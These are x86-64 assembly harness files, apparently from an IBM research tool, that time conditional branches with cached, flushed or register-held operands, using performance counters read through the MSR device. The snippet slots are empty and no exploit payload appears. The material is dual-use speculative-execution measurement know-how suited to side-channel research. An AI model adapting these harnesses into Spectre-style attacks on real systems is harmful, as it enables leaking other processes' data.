1 | ; Copyright 2021 IBM Corporation
2 | ;
3 | ; Licensed under the Apache License, Version 2.0 (the "License");
4 | ; you may not use this file except in compliance with the License.
5 | ; You may obtain a copy of the License at
6 | ;
7 | ; http://www.apache.org/licenses/LICENSE-2.0
8 | ;
9 | ; Unless required by applicable law or agreed to in writing, software
10 | ; distributed under the License is distributed on an "AS IS" BASIS,
11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | ; See the License for the specific language governing permissions and
13 | ; limitations under the License.
14 | ; Harness: branch on warmup_cnt compared straight from memory, with no clflush before it, then the snippet slot; 12 passes between start_counter and stop_counter.
15 | [BITS 64]
16 | %include "common.inc"
17 | %include "pmc.inc"
18 | ; check_pinning, msr_*, *_counter and exit are not defined in this file; presumably they come from the two includes above.
19 | section .data
20 | warmup_cnt: db 1 ; with fill: a 64-byte group; read and written as a DWORD, the upper bytes come from fill
21 | fill: times 63 db 0
22 |
23 | warmup_cnt_fake: dw 2 ; not referenced by the code in this file
24 | fill2: times 62 db 0
25 |
26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 ; MSR device of CPU VICTIM_PROCESS_STR (defined outside this file); on Linux, opening /dev/cpu/N/msr needs the msr driver and elevated privileges
27 | fd: dq 0
28 | val: dq 0
29 | len: equ $-val ; len = 8, the size of val
30 | lea_array: times 40 db 0
31 | junk: db 1
32 | ;##### DATA STARTS HERE ########
33 |
34 | ;##### DATA ENDS HERE ########
35 |
36 | section .text
37 | global perf_test_entry:function
38 | global snippet:function ; NOTE(review): no snippet label in this file; confirm this export is needed
39 |
40 | perf_test_entry:
41 |     push rbp
42 |     mov rbp, rsp
43 |     sub rsp, len ; reserve len (8) bytes of stack
44 |
45 |     check_pinning VICTIM_PROCESS ; presumably verifies the run is pinned to CPU VICTIM_PROCESS
46 |     msr_open
47 |     msr_seek
48 | .data: ; loop head: a local code label, not the data section
49 |     mov eax, 0
50 |     cpuid ; serializing instruction ahead of the counted region
51 |     lfence
52 |     reset_counter
53 |     start_counter
54 |     cmp DWORD[warmup_cnt], 12 ; warmup_cnt runs 1..12, so the je is taken only on the last pass
55 |     je .else
56 | ; Snippet slot below: presumably replaced with the INST list of a .json configuration.
57 | ;##### SNIPPET STARTS HERE ######
58 |
59 | ;##### SNIPPET ENDS HERE ######
60 | ;lea rax, [lea_array+rax*2]
61 |
62 | .else:
63 |     lfence ; earlier instructions complete before the counter is stopped
64 |     stop_counter
65 |
66 |     inc DWORD[warmup_cnt]
67 |     cmp DWORD[warmup_cnt], 13
68 |     jl .data ; twelve passes
69 |
70 |     msr_close
71 |     exit 0
72 |
--------------------------------------------------------------------------------
/examples/v1_various_cond_cycles/v1_cond_complex_cached_div.asm:
--------------------------------------------------------------------------------
1 | ; Copyright 2021 IBM Corporation
2 | ;
3 | ; Licensed under the Apache License, Version 2.0 (the "License");
4 | ; you may not use this file except in compliance with the License.
5 | ; You may obtain a copy of the License at
6 | ;
7 | ; http://www.apache.org/licenses/LICENSE-2.0
8 | ;
9 | ; Unless required by applicable law or agreed to in writing, software
10 | ; distributed under the License is distributed on an "AS IS" BASIS,
11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | ; See the License for the specific language governing permissions and
13 | ; limitations under the License.
14 | ; Harness: the branch condition is a quotient, with the divisor read from memory and no clflush before it; snippet slot on the not-taken path; 12 passes.
15 | [BITS 64]
16 | %include "common.inc"
17 | %include "pmc.inc"
18 | ; check_pinning, msr_*, *_counter and exit are not defined in this file; presumably they come from the two includes above.
19 | section .data
20 | warmup_cnt: db 1 ; with fill: a 64-byte group; read and written as a DWORD, the upper bytes come from fill
21 | fill: times 63 db 0
22 |
23 | warmup_cnt_fake: dw 2 ; dividend, doubled after every pass
24 | fill2: times 62 db 0
25 |
26 | divisor: dw 2 ; overwritten with 4096 at the top of every pass
27 | fill3: times 62 db 0
28 |
29 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 ; MSR device of CPU VICTIM_PROCESS_STR (defined outside this file); on Linux, opening /dev/cpu/N/msr needs the msr driver and elevated privileges
30 | fd: dq 0
31 | val: dq 0
32 | len: equ $-val ; len = 8, the size of val
33 | lea_array: times 40 db 0
34 | junk: db 1
35 | ;##### DATA STARTS HERE ########
36 |
37 | ;##### DATA ENDS HERE ########
38 |
39 | section .text
40 | global perf_test_entry:function
41 | global snippet:function ; NOTE(review): no snippet label in this file; confirm this export is needed
42 |
43 | perf_test_entry:
44 |     push rbp
45 |     mov rbp, rsp
46 |     sub rsp, len ; reserve len (8) bytes of stack
47 |
48 |     check_pinning VICTIM_PROCESS ; presumably verifies the run is pinned to CPU VICTIM_PROCESS
49 |     msr_open
50 |     msr_seek
51 | .data: ; loop head: a local code label, not the data section
52 |     mov eax, 0
53 |     mov DWORD[divisor], 4096 ; 4-byte store: covers divisor and the first two bytes of fill3
54 |     mov r15d, DWORD[warmup_cnt_fake] ; dividend parked in r15d; assumes the counter macros leave r15 alone (TODO confirm)
55 |     cpuid ; serializing instruction ahead of the counted region
56 |     lfence
57 |     reset_counter
58 |     start_counter
59 |     xor edx, edx
60 |     mov eax, r15d
61 |     div DWORD[divisor] ; divisor was just stored, so it is presumably still cached
62 |     cmp eax, 1 ; quotient is 1 once warmup_cnt_fake has doubled from 2 to 4096, i.e. on pass 12
63 |     je .else
64 | ; Snippet slot below: presumably replaced with the INST list of a .json configuration.
65 | ;##### SNIPPET STARTS HERE ######
66 |
67 | ;##### SNIPPET ENDS HERE ######
68 | ;lea rax, [lea_array+rax*2]
69 |
70 | .else:
71 |     lfence ; earlier instructions complete before the counter is stopped
72 |     stop_counter
73 |     mov ax, 2 ; NOTE(review): sets only AX; the 32-bit mul below uses all of EAX, so this relies on EAX[31:16] being 0 after stop_counter (confirm)
74 |     mul DWORD[warmup_cnt_fake]
75 |     mov DWORD[warmup_cnt_fake], eax ; warmup_cnt_fake doubles each pass
76 |
77 |     inc DWORD[warmup_cnt]
78 |     cmp DWORD[warmup_cnt], 13
79 |     jl .data ; warmup_cnt runs 1..12: twelve passes
80 |
81 |     msr_close
82 |     exit 0
83 |
--------------------------------------------------------------------------------
/examples/v1_various_cond_cycles/v1_cond_complex_cached_mul.asm:
--------------------------------------------------------------------------------
1 | ; Copyright 2021 IBM Corporation
2 | ;
3 | ; Licensed under the Apache License, Version 2.0 (the "License");
4 | ; you may not use this file except in compliance with the License.
5 | ; You may obtain a copy of the License at
6 | ;
7 | ; http://www.apache.org/licenses/LICENSE-2.0
8 | ;
9 | ; Unless required by applicable law or agreed to in writing, software
10 | ; distributed under the License is distributed on an "AS IS" BASIS,
11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | ; See the License for the specific language governing permissions and
13 | ; limitations under the License.
14 | ; Harness: the branch condition is a product, with one factor read from memory and no clflush before it; snippet slot on the not-taken path; 12 passes.
15 | [BITS 64]
16 | %include "common.inc"
17 | %include "pmc.inc"
18 | ; check_pinning, msr_*, *_counter and exit are not defined in this file; presumably they come from the two includes above.
19 | section .data
20 | warmup_cnt: db 1 ; with fill: a 64-byte group; read and written as a DWORD, the upper bytes come from fill
21 | fill: times 63 db 0
22 |
23 | warmup_cnt_fake: dw 4096 ; factor, halved after every pass
24 | fill2: times 62 db 0
25 |
26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 ; MSR device of CPU VICTIM_PROCESS_STR (defined outside this file); on Linux, opening /dev/cpu/N/msr needs the msr driver and elevated privileges
27 | fd: dq 0
28 | val: dq 0
29 | len: equ $-val ; len = 8, the size of val
30 | lea_array: times 40 db 0
31 | junk: db 1
32 | ;##### DATA STARTS HERE ########
33 |
34 | ;##### DATA ENDS HERE ########
35 |
36 | section .text
37 | global perf_test_entry:function
38 | global snippet:function ; NOTE(review): no snippet label in this file; confirm this export is needed
39 |
40 | perf_test_entry:
41 |     push rbp
42 |     mov rbp, rsp
43 |     sub rsp, len ; reserve len (8) bytes of stack
44 |
45 |     check_pinning VICTIM_PROCESS ; presumably verifies the run is pinned to CPU VICTIM_PROCESS
46 |     msr_open
47 |     msr_seek
48 | .data: ; loop head: a local code label, not the data section
49 |     mov eax, 0
50 |     cpuid ; serializing instruction ahead of the counted region
51 |     lfence
52 |     reset_counter
53 |     start_counter
54 |     mov ax, 2 ; NOTE(review): sets only AX; the 32-bit mul below uses all of EAX, so this relies on EAX[31:16] being 0 after start_counter (confirm)
55 |     mul DWORD[warmup_cnt_fake]
56 |     cmp eax, 4 ; 2 * warmup_cnt_fake is 4 once the value has been halved from 4096 to 2, i.e. on pass 12
57 |     je .else
58 | ;##### SNIPPET STARTS HERE ######
59 |
60 | ;##### SNIPPET ENDS HERE ######
61 | ;lea rax, [lea_array+rax*2]
62 |
63 | .else:
64 |     lfence ; earlier instructions complete before the counter is stopped
65 |     stop_counter
66 |
67 |     mov eax, DWORD[warmup_cnt_fake]
68 |     mov ecx, 2
69 |     xor edx, edx
70 |     div ecx
71 |     mov DWORD[warmup_cnt_fake], eax ; warmup_cnt_fake halves each pass
72 |
73 |     inc DWORD[warmup_cnt]
74 |     cmp DWORD[warmup_cnt], 13
75 |     jl .data ; warmup_cnt runs 1..12: twelve passes
76 |
77 |     msr_close
78 |     exit 0
79 |
--------------------------------------------------------------------------------
/examples/v1_various_cond_cycles/v1_cond_complex_register_div.asm:
--------------------------------------------------------------------------------
1 | ; Copyright 2021 IBM Corporation
2 | ;
3 | ; Licensed under the Apache
License, Version 2.0 (the "License");
4 | ; you may not use this file except in compliance with the License.
5 | ; You may obtain a copy of the License at
6 | ;
7 | ; http://www.apache.org/licenses/LICENSE-2.0
8 | ;
9 | ; Unless required by applicable law or agreed to in writing, software
10 | ; distributed under the License is distributed on an "AS IS" BASIS,
11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | ; See the License for the specific language governing permissions and
13 | ; limitations under the License.
14 | ; Harness: the branch condition is a quotient computed from registers only (r15d / r14d); snippet slot on the not-taken path; 12 passes.
15 | [BITS 64]
16 | %include "common.inc"
17 | %include "pmc.inc"
18 | ; check_pinning, msr_*, *_counter and exit are not defined in this file; presumably they come from the two includes above.
19 | section .data
20 | warmup_cnt: db 1 ; with fill: a 64-byte group; read and written as a DWORD, the upper bytes come from fill
21 | fill: times 63 db 0
22 |
23 | warmup_cnt_fake: dq 2 ; dividend, doubled after every pass
24 | fill2: times 60 db 0 ; NOTE(review): 8 + 60 = 68 bytes, unlike the 64-byte warmup_cnt + fill group above; 56 would give 64 (confirm intent)
25 |
26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 ; MSR device of CPU VICTIM_PROCESS_STR (defined outside this file); on Linux, opening /dev/cpu/N/msr needs the msr driver and elevated privileges
27 | fd: dq 0
28 | val: dq 0
29 | len: equ $-val ; len = 8, the size of val
30 | lea_array: times 40 db 0
31 | junk: db 1
32 | ;##### DATA STARTS HERE ########
33 |
34 | ;##### DATA ENDS HERE ########
35 |
36 | section .text
37 | global perf_test_entry:function
38 | global snippet:function ; NOTE(review): no snippet label in this file; confirm this export is needed
39 |
40 | perf_test_entry:
41 |     push rbp
42 |     mov rbp, rsp
43 |     sub rsp, len ; reserve len (8) bytes of stack
44 |
45 |     check_pinning VICTIM_PROCESS ; presumably verifies the run is pinned to CPU VICTIM_PROCESS
46 |     msr_open
47 |     msr_seek
48 | .data: ; loop head: a local code label, not the data section
49 |     mov eax, 0
50 |     mov r15d, DWORD[warmup_cnt_fake] ; dividend and divisor are loaded into r15d/r14d before the counted region
51 |     mov r14d, 4096 ; assumes the counter macros leave r14 and r15 alone (TODO confirm)
52 |     cpuid ; serializing instruction ahead of the counted region
53 |     lfence
54 |     reset_counter
55 |     start_counter
56 |     xor edx, edx
57 |     mov eax, r15d
58 |     div r14d
59 |     cmp eax, 1 ; quotient is 1 once warmup_cnt_fake has doubled from 2 to 4096, i.e. on pass 12
60 |     je .else
61 | ; Snippet slot below: presumably replaced with the INST list of a .json configuration.
62 | ;##### SNIPPET STARTS HERE ######
63 |
64 | ;##### SNIPPET ENDS HERE ######
65 | ;lea rax, [lea_array+rax*2]
66 |
67 | .else:
68 |     lfence ; earlier instructions complete before the counter is stopped
69 |     stop_counter
70 |     mov ax, 2 ; NOTE(review): sets only AX; the 32-bit mul below uses all of EAX, so this relies on EAX[31:16] being 0 after stop_counter (confirm)
71 |     mul DWORD[warmup_cnt_fake]
72 |     mov DWORD[warmup_cnt_fake], eax ; warmup_cnt_fake doubles each pass
73 |
74 |     inc DWORD[warmup_cnt]
75 |     cmp DWORD[warmup_cnt], 13
76 |     jl .data ; warmup_cnt runs 1..12: twelve passes
77 |
78 |     msr_close
79 |     exit 0
80 |
--------------------------------------------------------------------------------
/examples/v1_various_cond_cycles/v1_cond_complex_register_mul.asm:
--------------------------------------------------------------------------------
1 | ; Copyright 2021 IBM Corporation
2 | ;
3 | ; Licensed under the Apache License, Version 2.0 (the "License");
4 | ; you may not use this file except in compliance with the License.
5 | ; You may obtain a copy of the License at
6 | ;
7 | ; http://www.apache.org/licenses/LICENSE-2.0
8 | ;
9 | ; Unless required by applicable law or agreed to in writing, software
10 | ; distributed under the License is distributed on an "AS IS" BASIS,
11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | ; See the License for the specific language governing permissions and
13 | ; limitations under the License.
14 | ; Harness: the branch condition is a product computed from registers only (2 * r15d); snippet slot on the not-taken path; 12 passes.
15 | [BITS 64]
16 | %include "common.inc"
17 | %include "pmc.inc"
18 | ; check_pinning, msr_*, *_counter and exit are not defined in this file; presumably they come from the two includes above.
19 | section .data
20 | warmup_cnt: db 1 ; with fill: a 64-byte group; read and written as a DWORD, the upper bytes come from fill
21 | fill: times 63 db 0
22 |
23 | warmup_cnt_fake: dw 4096 ; not referenced by the code in this file (r15d holds the factor)
24 | fill2: times 62 db 0
25 |
26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 ; MSR device of CPU VICTIM_PROCESS_STR (defined outside this file); on Linux, opening /dev/cpu/N/msr needs the msr driver and elevated privileges
27 | fd: dq 0
28 | val: dq 0
29 | len: equ $-val ; len = 8, the size of val
30 | lea_array: times 40 db 0
31 | junk: db 1
32 | ;##### DATA STARTS HERE ########
33 |
34 | ;##### DATA ENDS HERE ########
35 |
36 | section .text
37 | global perf_test_entry:function
38 | global snippet:function ; NOTE(review): no snippet label in this file; confirm this export is needed
39 |
40 | perf_test_entry:
41 |     push rbp
42 |     mov rbp, rsp
43 |     sub rsp, len ; reserve len (8) bytes of stack
44 |
45 |     check_pinning VICTIM_PROCESS ; presumably verifies the run is pinned to CPU VICTIM_PROCESS
46 |     msr_open
47 |     msr_seek
48 |
49 |     mov r15d, 4096 ; factor lives in r15d for the whole loop; assumes the counter macros leave r15 alone (TODO confirm)
50 | .data: ; loop head: a local code label, not the data section
51 |     mov eax, 0
52 |     cpuid ; serializing instruction ahead of the counted region
53 |     lfence
54 |     reset_counter
55 |     start_counter
56 |     mov ax, 2 ; NOTE(review): sets only AX; the 32-bit mul below uses all of EAX, so this relies on EAX[31:16] being 0 after start_counter (confirm)
57 |     mul r15d
58 |     cmp eax, 4 ; 2 * r15d is 4 once r15d has been halved from 4096 to 2, i.e. on pass 12
59 |     je .else
60 | ;##### SNIPPET STARTS HERE ######
61 |
62 | ;##### SNIPPET ENDS HERE ######
63 | ;lea rax, [lea_array+rax*2]
64 |
65 | .else:
66 |     lfence ; earlier instructions complete before the counter is stopped
67 |     stop_counter
68 |
69 |     mov eax, r15d
70 |     mov ecx, 2
71 |     xor edx, edx
72 |     div ecx
73 |     mov r15d, eax ; r15d halves each pass
74 |
75 |     inc DWORD[warmup_cnt]
76 |     cmp DWORD[warmup_cnt], 13
77 |     jl .data ; warmup_cnt runs 1..12: twelve passes
78 |
79 |     msr_close
80 |     exit 0
81 |
--------------------------------------------------------------------------------
/examples/v1_various_cond_cycles/v1_cond_complex_uncached_div.asm:
--------------------------------------------------------------------------------
1 | ; Copyright 2021 IBM Corporation
2 | ;
3 | ; Licensed under the Apache License, Version 2.0 (the "License");
4 | ; you may not use this file except in compliance with the License.
5 | ; You may obtain a copy of the License at
6 | ;
7 | ; http://www.apache.org/licenses/LICENSE-2.0
8 | ;
9 | ; Unless required by applicable law or agreed to in writing, software
10 | ; distributed under the License is distributed on an "AS IS" BASIS,
11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | ; See the License for the specific language governing permissions and
13 | ; limitations under the License.
14 | ; Harness: the branch condition is a quotient whose divisor is flushed from the cache before each pass; snippet slot on the not-taken path; 12 passes.
15 | [BITS 64]
16 | %include "common.inc"
17 | %include "pmc.inc"
18 | ; check_pinning, msr_*, *_counter and exit are not defined in this file; presumably they come from the two includes above.
19 | section .data
20 | warmup_cnt: db 1 ; with fill: a 64-byte group; read and written as a DWORD, the upper bytes come from fill
21 | fill: times 63 db 0
22 |
23 | warmup_cnt_fake: dw 2 ; dividend, doubled after every pass
24 | fill2: times 62 db 0
25 |
26 | divisor: dw 2 ; overwritten with 4096 at the top of every pass
27 | fill3: times 62 db 0
28 |
29 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 ; MSR device of CPU VICTIM_PROCESS_STR (defined outside this file); on Linux, opening /dev/cpu/N/msr needs the msr driver and elevated privileges
30 | fd: dq 0
31 | val: dq 0
32 | len: equ $-val ; len = 8, the size of val
33 | lea_array: times 40 db 0
34 | junk: db 1
35 | ;##### DATA STARTS HERE ########
36 |
37 | ;##### DATA ENDS HERE ########
38 |
39 | section .text
40 | global perf_test_entry:function
41 | global snippet:function ; NOTE(review): no snippet label in this file; confirm this export is needed
42 |
43 | perf_test_entry:
44 |     push rbp
45 |     mov rbp, rsp
46 |     sub rsp, len ; reserve len (8) bytes of stack
47 |
48 |     check_pinning VICTIM_PROCESS ; presumably verifies the run is pinned to CPU VICTIM_PROCESS
49 |     msr_open
50 |     msr_seek
51 | .data: ; loop head: a local code label, not the data section
52 |     mov eax, 0
53 |     mov DWORD[divisor], 4096 ; 4-byte store: covers divisor and the first two bytes of fill3
54 |     mov r15d, DWORD[warmup_cnt_fake] ; dividend parked in r15d; assumes the counter macros leave r15 alone (TODO confirm)
55 |     clflush [divisor] ; evict the divisor, so the div on line 62 has to fetch it from memory
56 |     cpuid ; serializing instruction ahead of the counted region
57 |     lfence
58 |     reset_counter
59 |     start_counter
60 |     xor edx, edx
61 |     mov eax, r15d
62 |     div DWORD[divisor]
63 |     cmp eax, 1 ; quotient is 1 once warmup_cnt_fake has doubled from 2 to 4096, i.e. on pass 12
64 |     je .else
65 | ; Snippet slot below: presumably replaced with the INST list of a .json configuration.
66 | ;##### SNIPPET STARTS HERE ######
67 |
68 | ;##### SNIPPET ENDS HERE ######
69 | ;lea rax, [lea_array+rax*2]
70 |
71 | .else:
72 |     lfence ; earlier instructions complete before the counter is stopped
73 |     stop_counter
74 |     mov ax, 2 ; NOTE(review): sets only AX; the 32-bit mul below uses all of EAX, so this relies on EAX[31:16] being 0 after stop_counter (confirm)
75 |     mul DWORD[warmup_cnt_fake]
76 |     mov DWORD[warmup_cnt_fake], eax ; warmup_cnt_fake doubles each pass
77 |
78 |     inc DWORD[warmup_cnt]
79 |     cmp DWORD[warmup_cnt], 13
80 |     jl .data ; warmup_cnt runs 1..12: twelve passes
81 |
82 |     msr_close
83 |     exit 0
84 |
--------------------------------------------------------------------------------
/examples/v1_various_cond_cycles/v1_cond_complex_uncached_mul.asm:
--------------------------------------------------------------------------------
1 | ; Copyright 2021 IBM Corporation
2 | ;
3 | ; Licensed under the Apache License, Version 2.0 (the "License");
4 | ; you may not use this file except in compliance with the License.
5 | ; You may obtain a copy of the License at
6 | ;
7 | ; http://www.apache.org/licenses/LICENSE-2.0
8 | ;
9 | ; Unless required by applicable law or agreed to in writing, software
10 | ; distributed under the License is distributed on an "AS IS" BASIS,
11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | ; See the License for the specific language governing permissions and
13 | ; limitations under the License.
14 | ; Harness: the branch condition is a product whose memory factor is flushed from the cache before each pass; snippet slot on the not-taken path; 12 passes.
15 | [BITS 64]
16 | %include "common.inc"
17 | %include "pmc.inc"
18 | ; check_pinning, msr_*, *_counter and exit are not defined in this file; presumably they come from the two includes above.
19 | section .data
20 | warmup_cnt: db 1 ; with fill: a 64-byte group; read and written as a DWORD, the upper bytes come from fill
21 | fill: times 63 db 0
22 |
23 | warmup_cnt_fake: dw 4096 ; factor, halved after every pass
24 | fill2: times 62 db 0
25 |
26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 ; MSR device of CPU VICTIM_PROCESS_STR (defined outside this file); on Linux, opening /dev/cpu/N/msr needs the msr driver and elevated privileges
27 | fd: dq 0
28 | val: dq 0
29 | len: equ $-val ; len = 8, the size of val
30 | lea_array: times 40 db 0
31 | junk: db 1
32 | ;##### DATA STARTS HERE ########
33 |
34 | ;##### DATA ENDS HERE ########
35 |
36 | section .text
37 | global perf_test_entry:function
38 | global snippet:function ; NOTE(review): no snippet label in this file; confirm this export is needed
39 |
40 | perf_test_entry:
41 |     push rbp
42 |     mov rbp, rsp
43 |     sub rsp, len ; reserve len (8) bytes of stack
44 |
45 |     check_pinning VICTIM_PROCESS ; presumably verifies the run is pinned to CPU VICTIM_PROCESS
46 |     msr_open
47 |     msr_seek
48 | .data: ; loop head: a local code label, not the data section
49 |     clflush [warmup_cnt_fake] ; evict the factor, so the mul on line 56 has to fetch it from memory
50 |     mov eax, 0
51 |     cpuid ; serializing instruction ahead of the counted region
52 |     lfence
53 |     reset_counter
54 |     start_counter
55 |     mov ax, 2 ; NOTE(review): sets only AX; the 32-bit mul below uses all of EAX, so this relies on EAX[31:16] being 0 after start_counter (confirm)
56 |     mul DWORD[warmup_cnt_fake]
57 |     cmp eax, 4 ; 2 * warmup_cnt_fake is 4 once the value has been halved from 4096 to 2, i.e. on pass 12
58 |     je .else
59 | ;##### SNIPPET STARTS HERE ######
60 |
61 | ;##### SNIPPET ENDS HERE ######
62 | ;lea rax, [lea_array+rax*2]
63 |
64 | .else:
65 |     lfence ; earlier instructions complete before the counter is stopped
66 |     stop_counter
67 |
68 |     mov eax, DWORD[warmup_cnt_fake]
69 |     mov ecx, 2
70 |     xor edx, edx
71 |     div ecx
72 |     mov DWORD[warmup_cnt_fake], eax ; warmup_cnt_fake halves each pass
73 |
74 |     inc DWORD[warmup_cnt]
75 |     cmp DWORD[warmup_cnt], 13
76 |     jl .data ; warmup_cnt runs 1..12: twelve passes
77 |
78 |     msr_close
79 |     exit 0
80 |
--------------------------------------------------------------------------------
/examples/v1_various_cond_cycles/v1_cond_register.asm:
--------------------------------------------------------------------------------
1 | ; Copyright 2021 IBM Corporation
2 | ;
3 | ; Licensed under the Apache License, Version 2.0 (the "License");
4 | ; you may not use this file except in compliance with the License.
5 | ; You may obtain a copy of the License at
6 | ;
7 | ; http://www.apache.org/licenses/LICENSE-2.0
8 | ;
9 | ; Unless required by applicable law or agreed to in writing, software
10 | ; distributed under the License is distributed on an "AS IS" BASIS,
11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | ; See the License for the specific language governing permissions and
13 | ; limitations under the License.
14 | ; Harness: branch on a loop counter held in a register (r15), so the condition needs no memory access; snippet slot on the not-taken path; 12 passes.
15 | [BITS 64]
16 | %include "common.inc"
17 | %include "pmc.inc"
18 | ; check_pinning, msr_*, *_counter and exit are not defined in this file; presumably they come from the two includes above.
19 | section .data
20 | warmup_cnt: db 1 ; warmup_cnt and warmup_cnt_fake are not referenced by the code in this file
21 | fill: times 63 db 0
22 |
23 | warmup_cnt_fake: dw 2
24 | fill2: times 62 db 0
25 |
26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 ; MSR device of CPU VICTIM_PROCESS_STR (defined outside this file); on Linux, opening /dev/cpu/N/msr needs the msr driver and elevated privileges
27 | fd: dq 0
28 | val: dq 0
29 | len: equ $-val ; len = 8, the size of val
30 | lea_array: times 40 db 0
31 | junk: db 1
32 | ;##### DATA STARTS HERE ########
33 |
34 | ;##### DATA ENDS HERE ########
35 |
36 | section .text
37 | global perf_test_entry:function
38 | global snippet:function ; NOTE(review): no snippet label in this file; confirm this export is needed
39 |
40 | perf_test_entry:
41 |     push rbp
42 |     mov rbp, rsp
43 |     sub rsp, len ; reserve len (8) bytes of stack
44 |
45 |     check_pinning VICTIM_PROCESS ; presumably verifies the run is pinned to CPU VICTIM_PROCESS
46 |     msr_open
47 |     msr_seek
48 |     mov r15, 1 ; loop counter; assumes the counter macros leave r15 alone (TODO confirm)
49 | .data: ; loop head: a local code label, not the data section
50 |     mov eax, 0
51 |     cpuid ; serializing instruction ahead of the counted region
52 |     lfence
53 |     reset_counter
54 |     start_counter
55 |     cmp r15, 12 ; r15 runs 1..12, so the je is taken only on the last pass
56 |     je .else
57 | ;##### SNIPPET STARTS HERE ######
58 |
59 | ;##### SNIPPET ENDS HERE ######
60 | ;lea rax, [lea_array+rax*2]
61 |
62 | .else:
63 |     lfence ; earlier instructions complete before the counter is stopped
64 |     stop_counter
65 |
66 |     inc r15
67 |     cmp r15, 13
68 |     jl .data ; twelve passes
69 |
70 |     msr_close
71 |     exit 0
72 |
--------------------------------------------------------------------------------
/examples/v1_various_cond_cycles/v1_cond_uncached.asm:
--------------------------------------------------------------------------------
1 | ; Copyright 2021 IBM Corporation
2 | ;
3 | ; Licensed under the Apache License, Version 2.0 (the "License");
4 | ; you may not use this file except in compliance with the License.
5 | ; You may obtain a copy of the License at
6 | ;
7 | ; http://www.apache.org/licenses/LICENSE-2.0
8 | ;
9 | ; Unless required by applicable law or agreed to in writing, software
10 | ; distributed under the License is distributed on an "AS IS" BASIS,
11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | ; See the License for the specific language governing permissions and
13 | ; limitations under the License.
14 | ; Harness: branch on warmup_cnt compared straight from memory after a clflush of that line; snippet slot on the not-taken path; 12 passes.
15 | [BITS 64]
16 | %include "common.inc"
17 | %include "pmc.inc"
18 | ; check_pinning, msr_*, *_counter and exit are not defined in this file; presumably they come from the two includes above.
19 | section .data
20 | warmup_cnt: db 1 ; with fill: a 64-byte group; read and written as a DWORD, the upper bytes come from fill
21 | fill: times 63 db 0
22 |
23 | warmup_cnt_fake: dw 2 ; not referenced by the code in this file
24 | fill2: times 62 db 0
25 |
26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 ; MSR device of CPU VICTIM_PROCESS_STR (defined outside this file); on Linux, opening /dev/cpu/N/msr needs the msr driver and elevated privileges
27 | fd: dq 0
28 | val: dq 0
29 | len: equ $-val ; len = 8, the size of val
30 | lea_array: times 40 db 0
31 | junk: db 1
32 | ;##### DATA STARTS HERE ########
33 |
34 | ;##### DATA ENDS HERE ########
35 |
36 | section .text
37 | global perf_test_entry:function
38 | global snippet:function ; NOTE(review): no snippet label in this file; confirm this export is needed
39 |
40 | perf_test_entry:
41 |     push rbp
42 |     mov rbp, rsp
43 |     sub rsp, len ; reserve len (8) bytes of stack
44 |
45 |     check_pinning VICTIM_PROCESS ; presumably verifies the run is pinned to CPU VICTIM_PROCESS
46 |     msr_open
47 |     msr_seek
48 | .data: ; loop head: a local code label, not the data section
49 |     clflush [warmup_cnt] ; evict the branch operand, so the compare on line 55 has to fetch it from memory
50 |     mov eax, 0
51 |     cpuid ; serializing instruction ahead of the counted region
52 |     lfence
53 |     reset_counter
54 |     start_counter
55 |     cmp DWORD[warmup_cnt], 12 ; warmup_cnt runs 1..12, so the je is taken only on the last pass
56 |     je .else
57 | ;##### SNIPPET STARTS HERE ######
58 |
59 | ;##### SNIPPET ENDS HERE ######
60 | ;lea rax, [lea_array+rax*2]
61 | .else:
62 |     lfence ; earlier instructions complete before the counter is stopped
63 |     stop_counter
64 |
65 |     inc DWORD[warmup_cnt]
66 |     cmp DWORD[warmup_cnt], 13
67 |     jl .data ; twelve passes
68 |
69 |     msr_close
70 |     exit 0
71 |
--------------------------------------------------------------------------------
/examples/v1_various_cond_cycles/v1_nocond_cached.asm:
--------------------------------------------------------------------------------
1 | ; Copyright 2021 IBM Corporation
2 | ;
3 | ; Licensed under the Apache License, Version 2.0 (the "License");
4 | ; you may not use this file except in compliance with the License.
5 | ; You may obtain a copy of the License at
6 | ;
7 | ; http://www.apache.org/licenses/LICENSE-2.0
8 | ;
9 | ; Unless required by applicable law or agreed to in writing, software
10 | ; distributed under the License is distributed on an "AS IS" BASIS,
11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | ; See the License for the specific language governing permissions and
13 | ; limitations under the License.
14 | ; Harness without a conditional branch: the snippet slot runs on every pass; presumably the baseline for v1_cond_cached.asm; 12 passes.
15 | [BITS 64]
16 | %include "common.inc"
17 | %include "pmc.inc"
18 | ; check_pinning, msr_*, *_counter and exit are not defined in this file; presumably they come from the two includes above.
19 | section .data
20 | warmup_cnt: db 1 ; with fill: a 64-byte group; read and written as a DWORD, the upper bytes come from fill
21 | fill: times 63 db 0
22 |
23 | warmup_cnt_fake: dw 2 ; not referenced by the code in this file
24 | fill2: times 62 db 0
25 |
26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 ; MSR device of CPU VICTIM_PROCESS_STR (defined outside this file); on Linux, opening /dev/cpu/N/msr needs the msr driver and elevated privileges
27 | fd: dq 0
28 | val: dq 0
29 | len: equ $-val ; len = 8, the size of val
30 | lea_array: times 40 db 0
31 | junk: db 1
